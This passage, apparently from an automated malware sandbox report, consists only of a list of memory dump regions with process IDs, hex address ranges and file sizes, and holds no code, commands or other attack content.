                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4604-341-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4612-312-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4616-249-0x00000000004C0000-0x000000000060A000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.3MB

                                                                                                          • memory/4616-242-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4616-248-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/4644-241-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4688-258-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                            Filesize

                                                                                                            3.5MB

                                                                                                          • memory/4688-255-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                            Filesize

                                                                                                            3.5MB

                                                                                                          • memory/4688-256-0x00000001401FBC30-mapping.dmp
                                                                                                          • memory/4740-315-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4752-360-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4764-208-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                            Filesize

                                                                                                            88KB

                                                                                                          • memory/4764-206-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4796-214-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4796-210-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4836-343-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4840-215-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4840-235-0x0000000002C14000-0x0000000002C15000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4840-233-0x0000000002C12000-0x0000000002C14000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4840-238-0x0000000002C15000-0x0000000002C17000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4840-223-0x0000000002C10000-0x0000000002C12000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4856-313-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4856-250-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4876-218-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4876-228-0x0000000000C30000-0x0000000000C32000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4920-237-0x0000000002612000-0x0000000002614000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4920-239-0x0000000002615000-0x0000000002616000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4920-227-0x0000000002610000-0x0000000002612000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4920-222-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4968-259-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5020-229-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5020-254-0x00000000035B0000-0x00000000035F8000-memory.dmp
                                                                                                            Filesize

                                                                                                            288KB

                                                                                                          • memory/5020-232-0x0000000000A20000-0x0000000000A2D000-memory.dmp
                                                                                                            Filesize

                                                                                                            52KB

                                                                                                          • memory/5052-355-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5128-272-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.0MB

                                                                                                          • memory/5128-267-0x00000283A5AE0000-0x00000283A5AF4000-memory.dmp
                                                                                                            Filesize

                                                                                                            80KB

                                                                                                          • memory/5128-262-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.0MB

                                                                                                          • memory/5128-264-0x00000001402CA898-mapping.dmp
                                                                                                          • memory/5164-265-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5180-344-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5228-346-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5232-366-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5276-266-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5276-294-0x000000000488A000-0x000000000498B000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/5344-318-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5412-278-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                            Filesize

                                                                                                            284KB

                                                                                                          • memory/5412-281-0x0000000000401480-mapping.dmp
                                                                                                          • memory/5416-345-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5420-359-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5492-347-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5536-354-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5580-333-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5656-325-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5668-351-0x0000000004430000-0x0000000004431000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5668-348-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5712-328-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5728-300-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5760-302-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5824-362-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5852-306-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5876-369-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5952-311-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6032-334-0x0000000000000000-mapping.dmp